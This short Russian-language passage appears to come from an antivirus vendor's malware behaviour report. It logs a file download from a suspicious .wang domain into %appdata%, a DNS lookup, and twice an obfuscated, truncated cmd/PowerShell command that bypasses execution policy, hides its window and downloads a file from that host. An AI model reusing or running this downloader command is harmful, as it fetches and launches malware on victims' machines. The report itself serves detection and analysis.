Техническая информация
- http://travelsserts.wang/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "PoweR^sHeLL.Exe -^E^Xe^c^uTiOnpolIc^y bYPAss^ -NO^PROfILe -^wind^o^wS^Tyle ^HIDd^E^N (nEW-^oBJEct sy^stEm^.nEt.^WEbCL^IeNt).d^OwN^lOA^d^file(^'http://travelsserts.wang/searc...
- DNS ASK tr####sserts.wang
- '<SYSTEM32>\cmd.exe' /C "PoweR^sHeLL.Exe -^E^Xe^c^uTiOnpolIc^y bYPAss^ -NO^PROfILe -^wind^o^wS^Tyle ^HIDd^E^N (nEW-^oBJEct sy^stEm^.nEt.^WEbCL^IeNt).d^OwN^lOA^d^file(^'http://travelsserts.wang/searc...' (со скрытым окном)